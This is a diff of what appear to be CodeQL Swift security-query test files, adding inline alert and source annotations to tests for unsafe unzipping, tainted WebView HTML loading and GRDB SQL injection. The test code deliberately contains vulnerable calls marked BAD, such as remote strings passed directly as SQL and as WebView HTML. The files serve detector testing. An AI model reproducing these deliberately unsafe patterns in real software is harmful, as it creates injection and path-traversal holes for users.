b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.swift index 5d7dc6c58b44..e2071513e3c9 100644 --- a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.swift +++ b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.swift @@ -59,12 +59,12 @@ func testCommandInjectionQhelpExamples() { let source = URL(fileURLWithPath: "/sourcePath") let destination = URL(fileURLWithPath: "/destination") - try Data(contentsOf: remoteURL, options: []).write(to: source) + try Data(contentsOf: remoteURL, options: []).write(to: source) // $ Source do { - try Zip.unzipFile(source, destination: destination, overwrite: true, password: nil) // BAD + try Zip.unzipFile(source, destination: destination, overwrite: true, password: nil) // BAD // $ Alert let fileManager = FileManager() - try fileManager.unzipItem(at: source, to: destination) // BAD + try fileManager.unzipItem(at: source, to: destination) // BAD // $ Alert } catch { print("Error: \(error)") } diff --git a/swift/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref b/swift/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref index 87be59af70b3..802e59a6f873 100644 --- a/swift/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref +++ b/swift/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref @@ -1 +1 @@ -queries/Security/CWE-078/CommandInjection.ql \ No newline at end of file +query: queries/Security/CWE-078/CommandInjection.ql diff --git a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected index c2fefc171e64..d796aa2da25e 100644 --- a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected +++ b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected @@ -1,3 +1,22 @@ +#select +| UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | UnsafeWebViewFetch.swift:103:30:103:84 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:106:25:106:25 | data | UnsafeWebViewFetch.swift:105:18:105:72 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:106:25:106:25 | data | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | UnsafeWebViewFetch.swift:109:30:109:53 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:127:25:127:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:127:25:127:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:174:25:174:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:174:25:174:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | Tainted data is used in a WebView fetch without restricting the base URL. | edges | UnsafeWebViewFetch.swift:94:10:94:37 | try ... | UnsafeWebViewFetch.swift:117:21:117:35 | call to getRemoteData() | provenance | | | UnsafeWebViewFetch.swift:94:10:94:37 | try ... | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | provenance | | @@ -135,22 +154,3 @@ nodes | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | semmle.label | htmlData | | UnsafeWebViewFetch.swift:211:25:211:25 | htmlData | semmle.label | htmlData | subpaths -#select -| UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | UnsafeWebViewFetch.swift:103:30:103:84 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:106:25:106:25 | data | UnsafeWebViewFetch.swift:105:18:105:72 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:106:25:106:25 | data | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | UnsafeWebViewFetch.swift:109:30:109:53 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:127:25:127:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:127:25:127:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:174:25:174:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:174:25:174:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | Tainted data is used in a WebView fetch without restricting the base URL. | diff --git a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.qlref b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.qlref index a5c8cb457a03..18d2fc0a49df 100644 --- a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.qlref +++ b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.qlref @@ -1 +1,2 @@ -queries/Security/CWE-079/UnsafeWebViewFetch.ql \ No newline at end of file +query: queries/Security/CWE-079/UnsafeWebViewFetch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.swift b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.swift index 1b687ade014b..ebac2b89a0b7 100644 --- a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.swift +++ b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.swift @@ -91,7 +91,7 @@ func getRemoteData() -> String { let url = URL(string: "http://example.com/") do { - return try String(contentsOf: url!) + return try String(contentsOf: url!) // $ Source } catch { return "" } @@ -100,13 +100,13 @@ func getRemoteData() -> String { func testSimpleFlows() { let webview = UIWebView() - webview.loadHTMLString(try! String(contentsOf: URL(string: "http://example.com/")!), baseURL: nil) // BAD + webview.loadHTMLString(try! String(contentsOf: URL(string: "http://example.com/")!), baseURL: nil) // BAD // $ Alert - let data = try! String(contentsOf: URL(string: "http://example.com/")!) - webview.loadHTMLString(data, baseURL: nil) // BAD + let data = try! String(contentsOf: URL(string: "http://example.com/")!) // $ Source + webview.loadHTMLString(data, baseURL: nil) // BAD // $ Alert let url = URL(string: "http://example.com/") - webview.loadHTMLString(try! String(contentsOf: url!), baseURL: nil) // BAD + webview.loadHTMLString(try! String(contentsOf: url!), baseURL: nil) // BAD // $ Alert } func testUIWebView() { @@ -117,14 +117,14 @@ func testUIWebView() { let remoteString = getRemoteData() webview.loadHTMLString(localString, baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString(getRemoteData(), baseURL: nil) // BAD: HTML contains remote input, may access local secrets - webview.loadHTMLString(remoteString, baseURL: nil) // BAD + webview.loadHTMLString(getRemoteData(), baseURL: nil) // BAD: HTML contains remote input, may access local secrets // $ Alert + webview.loadHTMLString(remoteString, baseURL: nil) // BAD // $ Alert webview.loadHTMLString("" + localStringFragment + "", baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString("" + remoteString + "", baseURL: nil) // BAD + webview.loadHTMLString("" + remoteString + "", baseURL: nil) // BAD // $ Alert webview.loadHTMLString("\(localStringFragment)", baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString("\(remoteString)", baseURL: nil) // BAD + webview.loadHTMLString("\(remoteString)", baseURL: nil) // BAD // $ Alert let localSafeURL = URL(string: "about:blank") let localURL = URL(string: "http://example.com/") @@ -136,9 +136,9 @@ func testUIWebView() { webview.loadHTMLString(localString, baseURL: localURL!) // GOOD: a presumed safe baseURL is specified webview.loadHTMLString(remoteString, baseURL: localURL!) // GOOD: a presumed safe baseURL is specified webview.loadHTMLString(localString, baseURL: remoteURL!) // GOOD: the HTML data is local - webview.loadHTMLString(remoteString, baseURL: remoteURL!) // BAD + webview.loadHTMLString(remoteString, baseURL: remoteURL!) // BAD // $ Alert webview.loadHTMLString(localString, baseURL: remoteURL2!) // GOOD: the HTML data is local - webview.loadHTMLString(remoteString, baseURL: remoteURL2!) // BAD + webview.loadHTMLString(remoteString, baseURL: remoteURL2!) // BAD // $ Alert let localRequest = URLRequest(url: localURL!) let remoteRequest = URLRequest(url: remoteURL!) @@ -151,7 +151,7 @@ func testUIWebView() { webview.load(localData, mimeType: "text/html", textEncodingName: "utf-8", baseURL: localSafeURL!) // GOOD: the data is local webview.load(remoteData, mimeType: "text/html", textEncodingName: "utf-8", baseURL: localSafeURL!) // GOOD: a safe baseURL is specified webview.load(localData, mimeType: "text/html", textEncodingName: "utf-8", baseURL: remoteURL!) // GOOD: the HTML data is local - webview.load(remoteData, mimeType: "text/html", textEncodingName: "utf-8", baseURL: remoteURL!) // BAD + webview.load(remoteData, mimeType: "text/html", textEncodingName: "utf-8", baseURL: remoteURL!) // BAD // $ Alert } func testWKWebView() { @@ -164,14 +164,14 @@ func testWKWebView() { let remoteString = getRemoteData() webview.loadHTMLString(localString, baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString(getRemoteData(), baseURL: nil) // BAD - webview.loadHTMLString(remoteString, baseURL: nil) // BAD + webview.loadHTMLString(getRemoteData(), baseURL: nil) // BAD // $ Alert + webview.loadHTMLString(remoteString, baseURL: nil) // BAD // $ Alert webview.loadHTMLString("" + localStringFragment + "", baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString("" + remoteString + "", baseURL: nil) // BAD + webview.loadHTMLString("" + remoteString + "", baseURL: nil) // BAD // $ Alert webview.loadHTMLString("\(localStringFragment)", baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString("\(remoteString)", baseURL: nil) // BAD + webview.loadHTMLString("\(remoteString)", baseURL: nil) // BAD // $ Alert let localSafeURL = URL(string: "about:blank") let localURL = URL(string: "http://example.com/") @@ -183,9 +183,9 @@ func testWKWebView() { webview.loadHTMLString(localString, baseURL: localURL!) // GOOD: a presumed safe baseURL is specified webview.loadHTMLString(remoteString, baseURL: localURL!) // GOOD: a presumed safe baseURL is specified webview.loadHTMLString(localString, baseURL: remoteURL!) // GOOD: the HTML data is local - webview.loadHTMLString(remoteString, baseURL: remoteURL!) // BAD + webview.loadHTMLString(remoteString, baseURL: remoteURL!) // BAD // $ Alert webview.loadHTMLString(localString, baseURL: remoteURL2!) // GOOD: the HTML data is local - webview.loadHTMLString(remoteString, baseURL: remoteURL2!) // BAD + webview.loadHTMLString(remoteString, baseURL: remoteURL2!) // BAD // $ Alert let localRequest = URLRequest(url: localURL!) let remoteRequest = URLRequest(url: remoteURL!) @@ -198,7 +198,7 @@ func testWKWebView() { webview.load(localData, mimeType: "text/html", characterEncodingName: "utf-8", baseURL: localSafeURL!) // GOOD: the data is local webview.load(remoteData, mimeType: "text/html", characterEncodingName: "utf-8", baseURL: localSafeURL!) // GOOD: a safe baseURL is specified webview.load(localData, mimeType: "text/html", characterEncodingName: "utf-8", baseURL: remoteURL!) // GOOD: the HTML data is local - webview.load(remoteData, mimeType: "text/html", characterEncodingName: "utf-8", baseURL: remoteURL!) // BAD + webview.load(remoteData, mimeType: "text/html", characterEncodingName: "utf-8", baseURL: remoteURL!) // BAD // $ Alert } func testQHelpExamples() { @@ -207,7 +207,7 @@ func testQHelpExamples() { // ... - webview.loadHTMLString(htmlData, baseURL: nil) // BAD + webview.loadHTMLString(htmlData, baseURL: nil) // BAD // $ Alert webview.loadHTMLString(htmlData, baseURL: URL(string: "about:blank")) // GOOD } diff --git a/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift b/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift index b0319c84eb5a..cad757a7f168 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift +++ b/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift @@ -101,54 +101,54 @@ class CommonTableExpression { func test(database: Database) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = database.allStatements(sql: remoteString) // BAD + let _ = database.allStatements(sql: remoteString) // BAD // $ Alert let _ = database.allStatements(sql: localString) // GOOD - let _ = database.allStatements(sql: remoteString, arguments: nil) // BAD + let _ = database.allStatements(sql: remoteString, arguments: nil) // BAD // $ Alert let _ = database.allStatements(sql: localString, arguments: nil) // GOOD - let _ = database.cachedStatement(sql: remoteString) // BAD + let _ = database.cachedStatement(sql: remoteString) // BAD // $ Alert let _ = database.cachedStatement(sql: localString) // GOOD - let _ = database.internalCachedStatement(sql: remoteString) // BAD + let _ = database.internalCachedStatement(sql: remoteString) // BAD // $ Alert let _ = database.internalCachedStatement(sql: localString) // GOOD - database.execute(sql: remoteString) // BAD + database.execute(sql: remoteString) // BAD // $ Alert database.execute(sql: localString) // GOOD - database.execute(sql: remoteString, arguments: StatementArguments()) // BAD + database.execute(sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert database.execute(sql: localString, arguments: StatementArguments()) // GOOD - let _ = database.makeStatement(sql: remoteString) // BAD + let _ = database.makeStatement(sql: remoteString) // BAD // $ Alert let _ = database.makeStatement(sql: localString) // GOOD - let _ = database.makeStatement(sql: remoteString, prepFlags: 0) // BAD + let _ = database.makeStatement(sql: remoteString, prepFlags: 0) // BAD // $ Alert let _ = database.makeStatement(sql: localString, prepFlags: 0) // GOOD } func testSqlRequest() throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = SQLRequest(stringLiteral: remoteString) // BAD + let _ = SQLRequest(stringLiteral: remoteString) // BAD // $ Alert let _ = SQLRequest(stringLiteral: localString) // GOOD - let _ = SQLRequest(unicodeScalarLiteral: remoteString) // BAD + let _ = SQLRequest(unicodeScalarLiteral: remoteString) // BAD // $ Alert let _ = SQLRequest(unicodeScalarLiteral: localString) // GOOD - let _ = SQLRequest(extendedGraphemeClusterLiteral: remoteString) // BAD + let _ = SQLRequest(extendedGraphemeClusterLiteral: remoteString) // BAD // $ Alert let _ = SQLRequest(extendedGraphemeClusterLiteral: localString) // GOOD - let _ = SQLRequest(stringInterpolation: remoteString) // BAD + let _ = SQLRequest(stringInterpolation: remoteString) // BAD // $ Alert let _ = SQLRequest(stringInterpolation: localString) // GOOD - let _ = SQLRequest(sql: remoteString) // BAD - let _ = SQLRequest(sql: remoteString, arguments: StatementArguments()) // BAD - let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD - let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), cached: false) // BAD - let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), adapter: nil, cached: false) // BAD - let _ = SQLRequest(sql: remoteString, adapter: nil) // BAD - let _ = SQLRequest(sql: remoteString, adapter: nil, cached: false) // BAD - let _ = SQLRequest(sql: remoteString, cached: false) // BAD + let _ = SQLRequest(sql: remoteString) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), cached: false) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), adapter: nil, cached: false) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, adapter: nil) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, adapter: nil, cached: false) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, cached: false) // BAD // $ Alert let _ = SQLRequest(sql: localString) // GOOD let _ = SQLRequest(sql: localString, arguments: StatementArguments()) // GOOD let _ = SQLRequest(sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD @@ -161,15 +161,15 @@ func testSqlRequest() throws { func testSql() throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = SQL(stringLiteral: remoteString) // BAD - let _ = SQL(unicodeScalarLiteral: remoteString) // BAD - let _ = SQL(extendedGraphemeClusterLiteral: remoteString) // BAD - let _ = SQL(stringInterpolation: remoteString) // BAD - let _ = SQL(sql: remoteString) // BAD + let _ = SQL(stringLiteral: remoteString) // BAD // $ Alert + let _ = SQL(unicodeScalarLiteral: remoteString) // BAD // $ Alert + let _ = SQL(extendedGraphemeClusterLiteral: remoteString) // BAD // $ Alert + let _ = SQL(stringInterpolation: remoteString) // BAD // $ Alert + let _ = SQL(sql: remoteString) // BAD // $ Alert let sql1 = SQL(stringLiteral: "") - sql1.append(sql: remoteString) // BAD + sql1.append(sql: remoteString) // BAD // $ Alert let _ = SQL(stringLiteral: localString) // GOOD let _ = SQL(unicodeScalarLiteral: localString) // GOOD @@ -182,34 +182,34 @@ func testSql() throws { func test(tableDefinition: TableDefinition) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - tableDefinition.column(sql: remoteString) // BAD + tableDefinition.column(sql: remoteString) // BAD // $ Alert tableDefinition.column(sql: localString) // GOOD - tableDefinition.check(sql: remoteString) // BAD + tableDefinition.check(sql: remoteString) // BAD // $ Alert tableDefinition.check(sql: localString) // GOOD - tableDefinition.constraint(sql: remoteString) // BAD + tableDefinition.constraint(sql: remoteString) // BAD // $ Alert tableDefinition.constraint(sql: localString) // GOOD } func test(tableAlteration: TableAlteration) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - tableAlteration.addColumn(sql: remoteString) // BAD + tableAlteration.addColumn(sql: remoteString) // BAD // $ Alert tableAlteration.addColumn(sql: localString) // GOOD } func test(columnDefinition: ColumnDefinition) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = columnDefinition.check(sql: remoteString) // BAD - let _ = columnDefinition.defaults(sql: remoteString) // BAD - let _ = columnDefinition.generatedAs(sql: remoteString) // BAD - let _ = columnDefinition.generatedAs(sql: remoteString, .virtual) // BAD + let _ = columnDefinition.check(sql: remoteString) // BAD // $ Alert + let _ = columnDefinition.defaults(sql: remoteString) // BAD // $ Alert + let _ = columnDefinition.generatedAs(sql: remoteString) // BAD // $ Alert + let _ = columnDefinition.generatedAs(sql: remoteString, .virtual) // BAD // $ Alert let _ = columnDefinition.check(sql: localString) // GOOD let _ = columnDefinition.defaults(sql: localString) // GOOD @@ -219,67 +219,67 @@ func test(columnDefinition: ColumnDefinition) throws { func testTableRecord() throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = TableRecord.select(sql: remoteString) // BAD - let _ = TableRecord.select(sql: remoteString, arguments: StatementArguments()) // BAD + let _ = TableRecord.select(sql: remoteString) // BAD // $ Alert + let _ = TableRecord.select(sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert let _ = TableRecord.select(sql: localString) // GOOD let _ = TableRecord.select(sql: localString, arguments: StatementArguments()) // GOOD - let _ = TableRecord.filter(sql: remoteString) // BAD - let _ = TableRecord.filter(sql: remoteString, arguments: StatementArguments()) // BAD + let _ = TableRecord.filter(sql: remoteString) // BAD // $ Alert + let _ = TableRecord.filter(sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert let _ = TableRecord.filter(sql: localString) // GOOD let _ = TableRecord.filter(sql: localString, arguments: StatementArguments()) // GOOD - let _ = TableRecord.order(sql: remoteString) // BAD - let _ = TableRecord.order(sql: remoteString, arguments: StatementArguments()) // BAD + let _ = TableRecord.order(sql: remoteString) // BAD // $ Alert + let _ = TableRecord.order(sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert let _ = TableRecord.order(sql: localString) // GOOD let _ = TableRecord.order(sql: localString, arguments: StatementArguments()) // GOOD } func test(statementCache: StatementCache) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = statementCache.statement(remoteString) // BAD + let _ = statementCache.statement(remoteString) // BAD // $ Alert let _ = statementCache.statement(localString) // GOOD } func test(row: Row, stmt: Statement) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - row.fetchCursor(stmt, sql: remoteString) // BAD - row.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - row.fetchCursor(stmt, sql: remoteString, adapter: nil) // BAD - row.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchCursor(stmt, sql: remoteString) // BAD // $ Alert + row.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + row.fetchCursor(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + row.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert row.fetchCursor(stmt, sql: localString) // GOOD row.fetchCursor(stmt, sql: localString, arguments: StatementArguments()) // GOOD row.fetchCursor(stmt, sql: localString, adapter: nil) // GOOD row.fetchCursor(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - row.fetchAll(stmt, sql: remoteString) // BAD - row.fetchAll(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - row.fetchAll(stmt, sql: remoteString, adapter: nil) // BAD - row.fetchAll(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchAll(stmt, sql: remoteString) // BAD // $ Alert + row.fetchAll(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + row.fetchAll(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + row.fetchAll(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert row.fetchAll(stmt, sql: localString) // GOOD row.fetchAll(stmt, sql: localString, arguments: StatementArguments()) // GOOD row.fetchAll(stmt, sql: localString, adapter: nil) // GOOD row.fetchAll(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - row.fetchOne(stmt, sql: remoteString) // BAD - row.fetchOne(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - row.fetchOne(stmt, sql: remoteString, adapter: nil) // BAD - row.fetchOne(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchOne(stmt, sql: remoteString) // BAD // $ Alert + row.fetchOne(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + row.fetchOne(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + row.fetchOne(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert row.fetchOne(stmt, sql: localString) // GOOD 